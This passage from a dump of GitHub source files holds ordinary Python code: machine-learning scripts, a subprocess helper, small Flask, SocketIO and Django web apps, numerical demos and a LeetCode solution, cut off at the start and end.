pycaret.regression.compare_models(n_select=5, sort='MSE')\r\n tuned_top5 = [pycaret.regression.tune_model(i,\r\n optimize='MSE',\r\n n_iter=10,\r\n search_library='tune-sklearn',\r\n search_algorithm='bayesian',\r\n early_stopping=True,\r\n choose_better=True) for i in top5]\r\n bagged_top5 = [pycaret.regression.ensemble_model(i, optimize='MSE') for i in tuned_top5]\r\n blender = pycaret.regression.blend_models(estimator_list=top5, optimize='MSE')\r\n best_regression_model = pycaret.regression.automl(optimize='MSE')\r\n regressionPredictions = pycaret.regression.predict_model(best_regression_model, data=test_features)['Label']\r\n return regressionPredictions\r\n\r\n#### CREATE submission.csv ####\r\npd.concat([predictClassification(), predictRegression()], axis=1).to_csv('submission.csv', encoding='utf-8', header=False, index=False)\r\n","repo_name":"gibz104/alphamev-submission","sub_path":"submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":13289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"24672404754","text":"import os\nimport subprocess\n\ndef shell_run(cmd, stdout=None, stdin=None, stderr=None):\n if stderr is None:\n stderr = open(os.devnull, \"w\")\n elif isinstance(stderr, str):\n stderr = open(stderr, \"w\")\n\n if stdout is None:\n stdout = open(os.devnull, \"w\")\n elif isinstance(stdout, str):\n stdout = open(stdout, \"w\")\n\n res = subprocess.call(cmd, stdout=stdout, stderr=stderr, stdin=stdin)\n\n stderr.close()\n stdout.close()\n\n return res","repo_name":"SPOClab-ca/COVFEFE","sub_path":"utils/shell_run.py","file_name":"shell_run.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"7"} +{"seq_id":"16999779629","text":"import glob\nimport string\nimport keyword\nimport decamelize\nimport nltk\nimport json\nimport logging\nimport re\nimport os\nimport numpy as np\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nimport pandas as pd\n\nlogging.basicConfig(level=logging.DEBUG)\n\n# This extraction of concepts is based on the NLP method\n\ndef extract(folder, project_name, nlp):\n\n extracted_code = []\n extracted_test = []\n\n kw_pattern = re.compile(r'\\b(' + r'|'.join(generate_kw()) + r')\\b\\s*')\n test_pattern = re.compile(r'test', re.IGNORECASE)\n\n # fetch all java files from folder\n files = [f for f in glob.glob(folder + '**/*.java', recursive=True)]\n\n # remove any folders that may resemble a file\n files = [f for f in files if os.path.isfile(f)]\n\n #remove only test files\n code_files = [f for f in files if not test_pattern.search(f)]\n\n # take only test files\n test_files = [f for f in files if test_pattern.search(f)]\n\n # FOR CODE\n code_token_ctr = 0\n\n for f in code_files:\n # ingest the source code\n try:\n res = code_ingest(f, project_name, kw_pattern, nlp)\n extracted_code.append(res[0])\n code_token_ctr+=res[1]\n except:\n logging.debug('Unable to read code {}'.format(f))\n # classes.append(x)\n # methods.append(y)\n # attributes.append(z)\n\n # FOR TEST\n test_token_ctr = 0\n\n for f in test_files:\n # ingest the source code\n try:\n res = code_ingest(f, project_name, kw_pattern, nlp)\n extracted_test.append(res[0])\n test_token_ctr+=res[1]\n except:\n logging.debug('Unable to read code {}'.format(f))\n # classes.append(x)\n # methods.append(y)\n # attributes.append(z)\n\n extracted_code = [ x for x in extracted_code if x ] # remove empty strings\n 
extracted_test = [ x for x in extracted_test if x ] # remove empty strings\n\n extracted_code = ','.join(extracted_code)\n extracted_test = ','.join(extracted_test)\n\n return extracted_code, len(code_files), code_token_ctr, extracted_test, len(test_files), test_token_ctr\n\ndef code_ingest(filename, project_name, kw_pattern, nlp):\n class_list = []\n att_list = []\n method_list = []\n\n try:\n with open(filename, 'r') as file:\n code_text = file.readlines()\n except:\n with open(filename, 'r', encoding='utf-8') as file:\n code_text = file.readlines()\n\n terms_list = []\n\n # strip strings of newlines and whitespaces\n code_text = [x.strip() for x in code_text]\n\n # only pull classes, attributes & methods\n for x in code_text:\n if (x.startswith('public') or x.startswith('private') or x.startswith('protected') or x.startswith('class')\n or x.startswith('enum')):\n terms_list.append(x)\n\n # remove noise by tokenising\n terms_list = [word_tokenize(x) for x in terms_list]\n\n # flatten list\n terms_list = [x for sublist in terms_list for x in sublist]\n\n # decamelize\n terms_list = [decamelize.convert(x) for x in terms_list]\n\n # split back those decamelised to tuple values (using only first '_')\n terms_list = [x.split('_') for x in terms_list]\n\n # flatten list\n terms_list = [x for sublist in terms_list for x in sublist]\n\n # remove any characters w/out meaning\n terms_list = [x for x in terms_list if (len(x) > 2 and x.isalpha() and x not in project_name)]\n\n # remove keywords\n terms = kw_pattern.sub('', ' '.join(terms_list))\n\n terms_list = [x.lemma_ for x in nlp(terms)]\n\n terms = ' '.join(terms_list)\n\n return terms, len(terms_list)\n\ndef generate_kw():\n # populate keywords list including stopwords\n try:\n with open('java_kw.txt', 'r') as f:\n java_kw = f.readlines()\n java_kw = [x.strip() for x in java_kw]\n except:\n print('Java keywords missing!')\n\n kw_list = keyword.kwlist # python keywords\n kw_list += java_kw # java keywords\n kw_list += (set(stopwords.words('english'))) # stop words\n return kw_list\n","repo_name":"zakipauzi/concept-domain-coverage","sub_path":"code_extract.py","file_name":"code_extract.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38044206543","text":"# numpy.fft模块中的fftshift函数可以将FFT输出中的直流分量移动到频谱的中央。ifftshift函数则是其逆操作。\nimport numpy as np\nimport cv2\nfrom matplotlib.pyplot import plot, show\n# wave=cv2.imread('U.jpg',0)\n# # x = np.linspace(0, 2 * np.pi, 30)\n# # wave = np.cos(x) # 创建一个包含30个点的余弦波信号。\n# transformed = np.fft.fft(wave) # 使用fft函数对余弦波信号进行傅里叶变换。\n# shifted = np.fft.fftshift(transformed) # 使用fftshift函数进行移频操作。\n# # orignal=(np.all((np.fft.ifftshift(shifted) - transformed)<10**-9))\n# print(np.all((np.fft.ifftshift(shifted) - transformed) < 10 ** -9)) # 用ifftshift函数进行逆操作,这将还原移频操作前的信号。\n# plot(transformed, lw=2)\n# # plot(shifted, lw=3)\n# show() # 使用Matplotlib分别绘制变换和移频处理后的信号。\n# freqs = np.fft.fftfreq(9, d=1./9).reshape(3, 3)\n\nfreqs1=np.array([[ 0., 1., 2.],[ 3., 4., -4.],[-3., -2., -1.]])\nfreqs2=np.array([[ 100., 1., 2.],[ 300., 4., -4.],[-3., -2., -1.]])\n# print=( np.fft.ifftshift(np.fft.fftshift(freqs)))\n\ntransformed1 = np.fft.fft(freqs1)\ntransformed2 = 
np.fft.fft(freqs2)\r\nresult1=np.matmul(transformed1,transformed2)\r\nprint(abs(np.fft.ifftshift(np.fft.fftshift(result1))))\r\nprint(np.matmul(freqs1,freqs2))","repo_name":"wangyingyu1969/exercise","sub_path":"移频.py","file_name":"移频.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"35634813899","text":"#!/usr/bin/env python2\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 10 09:57:23 2018\r\n\r\n@author: susanachicano\r\n\"\"\"\r\n\r\nimport re\r\nimport xml.etree.cElementTree as ET\r\n\r\n# Regular expressions to check for specific patterns in the tags\r\nlower = re.compile(r'^([a-z]|_)*$')\r\nlower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$')\r\nproblemchars = re.compile(r'[=\\+/&<>;\\'\"\\?%#$@\\,\\. \\t\\r\\n]')\r\n\r\nSAMPLE_FILE = \"sample_sf.osm\"\r\n\r\ndef key_type(element, keys):\r\n    if element.tag == \"tag\":\r\n        for tag in element.iter('tag'):\r\n            k = tag.get('k')\r\n            if lower.search(element.attrib['k']):\r\n                keys['lower'] = keys['lower'] + 1\r\n            elif lower_colon.search(element.attrib['k']):\r\n                keys['lower_colon'] = keys['lower_colon'] + 1\r\n            elif problemchars.search(element.attrib['k']):\r\n                keys['problemchars'] = keys['problemchars'] + 1\r\n            else:\r\n                keys['other'] = keys['other'] + 1\r\n        \r\n    return keys\r\n\r\ndef process_map(filename):\r\n    keys = {\"lower\": 0, \"lower_colon\": 0, \"problemchars\": 0, \"other\": 0}\r\n    for _, element in ET.iterparse(filename):\r\n        keys = key_type(element, keys)\r\n\r\n    return keys","repo_name":"schicano/Wrangle_OpenStreetMap_Data","sub_path":"tag_types.py","file_name":"tag_types.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"24121048847","text":"import json\n\nfrom flask import Flask, request\nimport rethinkdb as r\n\nfrom .utils.db import Database\n\nindex = \"\"\"\n<!DOCTYPE html>\n<html>\n<head>\n<meta charset=\"utf-8\">\n    <title>Strawpoll?</title>\n</head>\n<body>\n

Add an option!

\n
\n

Anime name:

\n

\n
\n

Options

\n {options}\n\n\n\"\"\"\n\nredirect = \"\"\"\n\n\n\n\n\n\n\n \n\n\n\"\"\"\n\nhref = \"\"\"\nBack\n\"\"\"\n\n\ndb = Database()\n\napp = Flask(__name__)\n\n\n@app.route(\"/test\")\ndef test():\n return \"This works? Testing python backend webserver.\"\n\n\n@app.route(\"/\") # \"/\" will refer to www.fwiedwice.me/strawpoll/\n@app.route(\"/poll\")\ndef poll():\n options = db.get_options()\n print(options)\n option_message = \"\"\n option_message += \"\"\"
\"\"\"\n for option, votes in options.items():\n option_message += ''\n option_message += \"{option:>20}:{votes:>5}
\".format(option=option,\n votes=votes)\n stuff = \"\"\n option_message += \"
{}
\".format(stuff)\n if len(options) > 0:\n option_message += \"\"\"

\"\"\"\n    return index.format(options=option_message)\n\n\n@app.route(\"/results\")\ndef results():\n    return \"No results yet.\"\n\n\n@app.route(\"/vote\", methods=[\"GET\"])\ndef vote():\n    args = {k: v[0] for k, v in dict(request.args).items()}\n    if request.method != \"GET\" or len(args) == 0:\n        return \"Invalid!\" + href\n\n    print(str(args))\n\n    option = args['option']\n\n    if not db.already_exists(option):\n        return \"Option doesn't exist<br>\" + href\n    db.add_vote(option)\n    votes = db.get_votes(option)\n    return \"{option} now has {votes} votes<br>\".format(option=option,\n                                                   votes=votes) + href\n\n\n@app.route(\"/addoption\", methods=[\"GET\"])\ndef addoption():\n    args = {k: v[0] for k, v in dict(request.args).items()}\n    if request.method != \"GET\" or len(args) == 0:\n        return \"Invalid!<br>\" + href\n\n    print(str(args))\n\n    option = args['option']\n\n    if db.already_exists(option):\n        return \"Already exists<br>\" + href\n    else:\n        db.create_option(option)\n        return \"Option created<br>\" + href\n\n\nif __name__ == \"__main__\":\n    app.run()\n","repo_name":"QingyuChai/Fake-Strawpoll","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"8875640625","text":"import os\n\ndef delete_dummy_files():\n    \"\"\"Delete dummy test files.\"\"\"\n    os.remove(\"package/dummy.py\")\n    os.remove(\"tests/dummy_test.py\")\n\ndef rename_project(project):\n    \"\"\"Rename the package directory.\"\"\"\n    os.rename(\"package\", project)\n\ndef update_test_config(project):\n    \"\"\"Update the test configuration.\"\"\"\n    original = open(\"tests/__init__.py\", \"r\").read()\n    open(\"tests/__init__.py\", \"w\").write(\n        original.replace(\"package\", project))\n\ndef update_linter_test(project):\n    \"\"\"Update the linter test.\"\"\"\n    original = open(\"tests/pylint_test.py\", \"r\").read()\n    open(\"tests/pylint_test.py\", \"w\").write(\n        original.replace('PROJECT_NAME=\"package\"', 'PROJECT_NAME=\"%s\"' % project))\n\ndef update_service_test(project):\n    \"\"\"Update the tests for the service submodule.\"\"\"\n    original = open(\"tests/service_test.py\", \"r\").read()\n    open(\"tests/service_test.py\", \"w\").write(\n        original.replace(\"from package import\", \"from %s import\" % project))\n\ndef update_builder_test(project):\n    \"\"\"Update the tests for the builder submodule.\"\"\"\n    original = open(\"tests/builder_test.py\", \"r\").read()\n    open(\"tests/builder_test.py\", \"w\").write(\n        original.replace(\"from package import\", \"from %s import\" % project))\n\ndef update_noseconfig(project):\n    \"\"\"Update the test configuration to match with the projects package name.\"\"\"\n    original = open(\"nose.cfg\", \"r\").read()\n    open(\"nose.cfg\", \"w\").write(\n        original.replace(\"cover-package=package,tests\", \"cover-package=%s,tests\" % project))\n\ndef update_pylintrc(project):\n    \"\"\"Update the init-hook for pylint.\"\"\"\n    original = open(\".pylintrc\", \"r\").read()\n    open(\".pylintrc\", \"w\").write(original.replace(\n        \"\"\"init-hook='import sys, os; sys.path.insert[0](\".\"); sys.path.insert[0](\"./package\");'\"\"\",\n        \"\"\"init-hook='import sys, os; sys.path.insert[0](\".\"); sys.path.insert[0](\"./%s\");'\"\"\"\n        % project))\n\ndef update_main(project, is_flask_service):\n    \"\"\"Remove the not required code from __main__.py\"\"\"\n    original = open(\"%s/__main__.py\" % project, \"r\").read()\n\n    original = original.replace(\"package\", project)\n\n    start_ms = \"#### START MICROSERVICE CODE\"\n    end_ms = \"#### END MICROSERVICE CODE\"\n    start_creation = \"#### START MICROSERVICE INSTANCE CREATION\"\n    end_creation = \"#### END MICROSERVICE INSTANCE CREATION\"\n\n    if not is_flask_service:\n        current_index = 0\n\n        new = original[current_index : original.find(start_ms)]\n        current_index = original.find(end_ms) + len(end_ms)\n\n        new += original[current_index : original.find(start_creation)]\n        current_index = original.find(end_creation) + len(end_creation)\n\n        new += original[current_index:]\n        original = new\n    else:\n        original = original.replace(\n            'make_app(\"package\")',\n            'make_app(\"%s\")' % project)\n\n    original = original.replace(start_ms, \"\").replace(end_ms, \"\")\n    original = original.replace(start_creation, \"\").replace(end_creation, \"\")\n\n    open(\"%s/__main__.py\" % project, \"w\").write(original)\n\ndef delete_flask_service_files(project):\n    \"\"\"Delete flask related files.\"\"\"\n    os.remove(\"%s/service.py\" % project)\n    
os.remove(\"tests/service_test.py\")\n\n os.remove(\"%s/builder.py\" % project)\n os.remove(\"tests/builder_test.py\")\n\ndef get_user_config():\n \"\"\"Reads the project configuration from the user.\n\n Returns:\n tuple: Returns a tuple, containing (project_name, is_flask_service)\n \"\"\"\n project = str(input(\"\"\"Please give your project name: \"\"\"))\n\n flask_service = str(input(\n \"\"\"Should \"%s\" contain a Flask service? (y/n) \"\"\" % project)\n ).lower().strip()\n\n if flask_service:\n flask_service = flask_service[0] == \"y\"\n\n return project, flask_service\n\ndef main():\n \"\"\"Run the initializtion and execute all steps to\n transform the template into a usable project.\n \"\"\"\n project, is_flask_service = get_user_config()\n\n delete_dummy_files()\n rename_project(project)\n update_test_config(project)\n update_linter_test(project)\n update_noseconfig(project)\n update_pylintrc(project)\n update_builder_test(project)\n update_service_test(project)\n update_main(project, is_flask_service)\n\n if not is_flask_service:\n delete_flask_service_files(project)\n\nif __name__==\"__main__\":\n main()\n print(\"You can now delete initialize.py\")\n","repo_name":"T-002/python-project-template","sub_path":"initialize.py","file_name":"initialize.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11757418852","text":"import random\n\nimport matplotlib\nimport numpy as np\nimport scipy.stats\nfrom matplotlib import pyplot as plt\n\n\ndef gen_data():\n random.seed(148)\n treatment_dist = (119.5, 5.0)\n control_dist = (120, 4.0)\n sample_size = 100\n treatment_times, control_times = [], []\n for s in range(sample_size):\n treatment_times.append(random.gauss(treatment_dist[0], treatment_dist[1]))\n control_times.append(random.gauss(control_dist[0], control_dist[1]))\n return control_times, treatment_times\n\n\ndef t_stat_p_value(control_times, treatment_times):\n control_mean = round(sum(control_times) / len(control_times), 2)\n treatment_mean = round(sum(treatment_times) / len(treatment_times), 2)\n print(f'Treatment mean - control mean = {round(treatment_mean - control_mean, 2)} minutes')\n two_sample_test = scipy.stats.ttest_ind(treatment_times, control_times, equal_var=False)\n print(f'The t-statistic from two-sample test is {round(two_sample_test[0], 2)}')\n print(f'The p-value from two-sample test is {round(two_sample_test[1], 2)}')\n\n\nif __name__ == '__main__':\n t_stat = -2.26\n t_dist = []\n num_bins = 1000\n for i in range(100000):\n t_dist.append(np.random.standard_t(198))\n\n matplotlib.use('TkAgg')\n plt.hist(t_dist, bins=num_bins, weights=np.array(len(t_dist) * [1]) / len(t_dist))\n plt.axvline(t_stat, color='w')\n plt.axvline(-t_stat, color='w')\n plt.title('T-distribution with 198 Degrees of Freedom')\n plt.xlabel('T-statistic')\n plt.ylabel('Probably')\n plt.show()\n\n control_times, treatment_times = gen_data()\n t_stat_p_value(control_times, treatment_times)\n ","repo_name":"zuzuqo/ossu","sub_path":"1 Intro CS/02.Intro to CS/21.Randomized Trials and Hypothesis Checking/21.1.Checking Significance/t_distribution.py","file_name":"t_distribution.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34645154740","text":"\ncont = 1\ntotal_eleitores = int(input(\"Quantos candidatos participaram dessa eleicao?\"))\nnumero_eleitor = 1\nlista_votos = []\na = 0\nwhile(cont 
<= total_eleitores):\n voto = (input(\"Diga o voto do candidato{}: (A) --> Geremias. (B) --> Lila. (C) --> Gogos\".format(numero_eleitor)))\n lista_votos.append(voto)\n cont += 1\nprint(lista_votos)\n\na = 0\nb = 0\nc = 0\nfor voto in lista_votos:\n if(voto == \"a\"):\n a = a + 1\n elif(voto == \"b\"):\n b = b + 1\n elif(voto == \"c\"):\n c = c + 1\nprint(\"Votos no Geremias:\", a)\nprint(\"Votos na Lila:\", b)\nprint(\"Votos no Gogos:\", c)\n\n","repo_name":"Felipecard/Codigos-Exercicios-Python","sub_path":"4. Listas/Eleicao.py","file_name":"Eleicao.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36318512272","text":"def make_average():\n # take advantage of the fact that series(lists) are \"\"mutable\"\"\n series = []\n\n def average(new_value):\n # series is a free variable\n series.append(new_value)\n print('series', series)\n total = sum(series)\n return total / len(series)\n\n return average\n\n\navg = make_average()\nprint(avg(10)) # series [10]\nprint(avg(11)) # series [10, 11]\nprint(avg(12)) # series [10, 11, 12]\n\nprint(avg.__code__.co_freevars) # ('series',)\n","repo_name":"twtrubiks/fluent-python-notes","sub_path":"what_is_the_closures/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"7"} +{"seq_id":"3968537302","text":"from flask_socketio import emit, send\nfrom datetime import datetime\nimport json\n\nfrom app.main.models import eInstance, eMessage\nfrom .. import socketio, mongodb\n\n\n@socketio.on('message')\ndef handle_message(msg):\n #get message sent from client(s)\n name = msg['name']\n content = msg['message']\n now = datetime.now().strftime('%A %I:%M:%S %p').lstrip(\"0\").replace(\" 0\", \" \")\n \n #put received message into database\n emessage_object = eMessage(name=name, content=content, date_posted=now)\n emessage_object.save()\n\n #broadcast received message to all clients\n json_data = {\n 'name' : name,\n 'content' : content,\n 'date' : now\n }\n send({'json_data' : json_data}, broadcast=True)\n\n@socketio.on('connected')\ndef handle_connection():\n #a new client joined; update page view; broadcast to all clients\n einst = eInstance.objects().first()\n einst.page_views += 1\n einst.update(page_views = einst.page_views)\n emit('page_view_increase', {'page_views' : einst.page_views}, broadcast=True)\n","repo_name":"ShubhankarGore/Live-Chat-Microservice","sub_path":"app/main/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"3099780290","text":"from django.db import transaction\nfrom django.core.exceptions import ValidationError\n\nfrom rest_framework import viewsets, status\nfrom rest_framework.generics import ListAPIView\nfrom rest_framework.response import Response\nfrom rest_framework import serializers\n\nfrom users.models import Jpersonas\nfrom users.serializers import JpersonasSerializer\n\nfrom .serializers import (\n JcanalesrecepcionesSerializer,\n JclasestarjetasSerializer,\n JtiposproductosSerializer,\n JconceptosSerializer,\n JmarcastarjetasSerializer,\n JprioridadesSerializer,\n JtipostarjetasSerializer,\n JtarjetasSerializer,\n JtiposcomentariosSerializer,\n JtickettiposSerializer,\n JtipostransaccionesSerializer,\n JproblemasSerializer,\n)\nfrom .models import (\n Jcanalesrecepciones,\n 
Jclasestarjetas,\n    Jtiposproductos,\n    Jconceptos,\n    Jmarcastarjetas,\n    Jprioridades,\n    Jtipostarjetas,\n    Jtarjetas,\n    Jtiposcomentarios,\n    Jtickettipos,\n    Jtipostransacciones,\n    Jproblemas,\n)\n\nCARD_TICKET_TYPE = 2\n\n\nclass JcanalesrecepcionesViewSet(viewsets.ModelViewSet):\n    queryset = Jcanalesrecepciones.objects.all()\n    serializer_class = JcanalesrecepcionesSerializer\n\n\nclass JclasestarjetasViewSet(viewsets.ModelViewSet):\n    queryset = Jclasestarjetas.objects.all()\n    serializer_class = JclasestarjetasSerializer\n\n\nclass JtiposproductosViewSet(viewsets.ModelViewSet):\n    queryset = Jtiposproductos.objects.all()\n    serializer_class = JtiposproductosSerializer\n\n\nclass JconceptosViewSet(viewsets.ModelViewSet):\n    queryset = Jconceptos.objects.all()\n    serializer_class = JconceptosSerializer\n\n\nclass JmarcastarjetasViewSet(viewsets.ModelViewSet):\n    queryset = Jmarcastarjetas.objects.all()\n    serializer_class = JmarcastarjetasSerializer\n\n\nclass JprioridadesViewSet(viewsets.ModelViewSet):\n    queryset = Jprioridades.objects.all()\n    serializer_class = JprioridadesSerializer\n\n\nclass JtipostarjetasViewSet(viewsets.ModelViewSet):\n    queryset = Jtipostarjetas.objects.all()\n    serializer_class = JtipostarjetasSerializer\n\n\nclass JtarjetasViewSet(viewsets.ModelViewSet):\n    queryset = Jtarjetas.objects.all()\n    serializer_class = JtarjetasSerializer\n\n\nclass JtiposcomentariosViewSet(viewsets.ModelViewSet):\n    queryset = Jtiposcomentarios.objects.all()\n    serializer_class = JtiposcomentariosSerializer\n\n\nclass JtickettiposViewSet(viewsets.ModelViewSet):\n    queryset = Jtickettipos.objects.all()\n    serializer_class = JtickettiposSerializer\n\n\nclass JtipostransaccionesViewSet(viewsets.ModelViewSet):\n    queryset = Jtipostransacciones.objects.all()\n    serializer_class = JtipostransaccionesSerializer\n\n\n# Custom view to fetch the Jconceptos records for a given product type.\nclass JtiposproductosJconceptosListView(ListAPIView):\n    queryset = Jconceptos.objects.all()\n    serializer_class = JconceptosSerializer\n\n    def list(self, request, *args, **kwargs):\n        idtipoproducto = self.kwargs.get(\"idtipoproducto\")\n        queryset = Jconceptos.objects.filter(\n            idtipoproducto=idtipoproducto,\n        )\n        if not queryset.exists():\n            return Response(\n                {\n                    \"detail\": \"idtipoproducto \"\n                    + f\"{idtipoproducto}\"\n                    + \" was not found in the records\"\n                },\n                status=status.HTTP_404_NOT_FOUND,\n            )\n        serializer = self.get_serializer(queryset, many=True)\n        return Response(serializer.data)\n\n\nclass JproblemasViewSet(viewsets.ModelViewSet):\n    queryset = Jproblemas.objects.all()\n    serializer_class = JproblemasSerializer\n\n    def create(self, request, *args, **kwargs):\n        personas_serializer = JpersonasSerializer(\n            data=request.data.get(\"persona\"), context={\"request\": request}\n        )\n        tarjeta_serializer = JtarjetasSerializer(\n            data=request.data.get(\"tarjeta\"), context={\"request\": request}\n        )\n        problemas_serializer = JproblemasSerializer(\n            data=request.data.get(\"ticket\"), context={\"request\": request}\n        )\n\n        personas_serializer.is_valid(raise_exception=True)\n        problemas_serializer.is_valid(raise_exception=True)\n\n        tipo_ticket = problemas_serializer.validated_data[\"idtipoticket\"]\n        data_ticket = problemas_serializer.validated_data\n\n        if tipo_ticket.idtipoticket == CARD_TICKET_TYPE:\n            try:\n                tarjeta_serializer.is_valid(raise_exception=True)\n            except serializers.ValidationError as exc:\n                return Response(\n                    {\n                        \"detail\": f\" Validation failed, please include tarjeta in the request, verbose {exc}\"\n                    },\n                    
status=status.HTTP_400_BAD_REQUEST,\n )\n tarjeta, created = self.create_tarjeta(tarjeta_serializer.validated_data)\n data_ticket[\"idtarjeta\"] = tarjeta\n tarjeta = JtarjetasSerializer(\n tarjeta, context={\"request\": request}\n ).data\n \n else:\n tarjeta = {}\n created = False\n\n with transaction.atomic():\n persona, created_persona = self.create_persona(\n personas_serializer.validated_data\n )\n\n data_ticket[\"idpersona\"] = persona\n\n try:\n ticket = Jproblemas.objects.create(**data_ticket)\n except ValidationError as exc:\n return Response({\"detail\": exc}, status=status.HTTP_403_FORBIDDEN)\n\n person_serializer = JpersonasSerializer(\n persona, context={\"request\": request}\n )\n ticket_serializer = JproblemasSerializer(\n ticket, context={\"request\": request}\n )\n\n return Response(\n {\n \"nueva persona\": created_persona,\n \"nueva tarjeta\": created,\n \"tarjeta\": tarjeta,\n \"persona\": person_serializer.data,\n \"ticket\": ticket_serializer.data,\n },\n status=status.HTTP_201_CREATED,\n )\n\n @staticmethod\n def create_persona(data):\n persona, created = Jpersonas.objects.update_or_create(\n identificacion=data[\"identificacion\"],\n defaults=data\n )\n return persona, created\n\n @staticmethod\n def create_tarjeta(data):\n # Use the provided unencrypted numerotarjeta value\n numerotarjeta = data[\"numerotarjeta\"]\n all_cards = Jtarjetas.objects.filter(\n idmarcatarjeta=data[\"idmarcatarjeta\"],\n idtipotarjeta=data[\"idtipotarjeta\"],\n idclasetarjeta=data[\"idclasetarjeta\"]\n )\n created = True\n for card in all_cards:\n if card.numerotarjeta == numerotarjeta:\n created = False\n return card, created\n \n tarjeta = Jtarjetas.objects.create(**data)\n return tarjeta, created\n\n\n \n \n \n","repo_name":"carlosviniharo/keta","sub_path":"keta/tickets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"72685181664","text":"from typing import List\n\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n \"\"\"\n https://leetcode.com/problems/best-time-to-buy-and-sell-stock-with-cooldown/discuss/75927/Share-my-thinking-process\n\n buy[i]: The maximum profit can be made if the first i days end with buy or wait.\n E.g \"buy, sell, buy\" or \"buy, cooldown, cooldown\"\n sell[i]: The maximum profit can be made if the first i days end with sell or wait.\n E.g \"buy, sell, buy, sell\" or \"buy, sell, cooldown, cooldown\"\n price: prices[i - 1], which is the stock price of the i-th day\n \"\"\"\n\n if len(prices) < 2:\n return 0\n\n sell, buy = 0, -prices[0]\n prev_sell, prev_buy = 0, 0\n for price in prices:\n prev_buy = buy\n buy = max(prev_sell - price, prev_buy)\n prev_sell = sell\n sell = max(prev_buy + price, prev_sell)\n\n return sell\n\n# buy[i]: means before day i what is the maxProfit for any sequence end with buy.\n# sell[i]: means before day i what is the maxProfit for any sequence end with sell.\n# rest[i]: means before day i what is the maxProfit for any sequence end with rest.\n#\n# (rest means no transaction on that day aka. 
cooldown)\n#\n# deduce the transition functions for them\n#\n# buy[i] = max(rest[i-1]-price, buy[i-1])\n# sell[i] = max(buy[i-1]+price, sell[i-1])\n# rest[i] = max(sell[i-1], buy[i-1], rest[i-1])\n#\n# to make sure sell before buy => buy[i] <= rest[i] (rest[i] <= sell[i]) => rest[i] = sell[i-1]\n#\n# buy[i] = max(sell[i-2]-price, buy[i-1])\n# sell[i] = max(buy[i-1]+price, sell[i-1])\n#\n# states of day i relies only on i-1 and i-2 => reduce space to O(1)\n","repo_name":"daviddwlee84/LeetCode","sub_path":"Python3/Array/BestTimeToBuyAndSellStockWithCooldown/DP309.py","file_name":"DP309.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"} +{"seq_id":"3763685740","text":"import argparse\nimport torch\nimport transformers\nfrom transformers import GPT2LMHeadModel, BertModel, GPT2Tokenizer, BertTokenizer\nimport datasets\nfrom datasets import load_dataset, load_metric, concatenate_datasets, Dataset\nfrom transformers import Trainer, TrainingArguments\nfrom tqdm import tqdm\nimport json\nimport wandb\n\nimport random\n\nfrom model import AE\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--pretrained_encoder\", type=str, default=\"bert-base-uncased\")\nparser.add_argument(\"--pretrained_decoder\", type=str, default=\"gpt2-medium\")\nparser.add_argument('--model_dir', default='../model/priorcontrol/')\nparser.add_argument(\"--no_cuda\", action=\"store_true\")\nparser.add_argument(\"--latent_size\", type=int, default=768)\nparser.add_argument(\"--latent_num\",type=int, default=1)\nparser.add_argument(\"--seq_len_per_latent\",type=int, default=20)\nparser.add_argument(\"--batch_size\", type=int, default=100)\nparser.add_argument(\"--epoch\",type=int, default=200)\nparser.add_argument(\"--lr\",type=float, default=1e-4)\nparser.add_argument(\"--fp16\", action=\"store_true\")\nparser.add_argument(\"--wandb\", action=\"store_true\")\nparser.add_argument(\"--no_fix\", action=\"store_true\")\nparser.add_argument(\"--max_length\", type=int, default=100)\nparser.add_argument(\"--model_path\", type=str, default='../model/multicontrol/checkpoint-30000/pytorch_model.bin')\nparser.add_argument(\"--variation\", type=float, default=1e-3)\n\n#prior\nparser.add_argument(\"--not_prior\", action=\"store_true\")\nparser.add_argument(\"--flow_num\", type=int, default=8)\nparser.add_argument(\"--prior_num\", type=int, default=8)\n\n#adv_z_prior\nparser.add_argument(\"--adv_z_prob_loss\", type=float, default=None)\nparser.add_argument(\"--adv_z_prob_grouping\", default=json.dumps([[0,1],[2,3,4,5],[6,7]]))\n\n#adv_x_prior\nparser.add_argument(\"--adv_x_prob_loss\", type=float, default=None)\n\n#prior_classify_loss\n\nparser.add_argument(\"--prior_classify_loss\", type=float, default=0.3)\nparser.add_argument(\"--prior_classifier_head_num\", type=int, 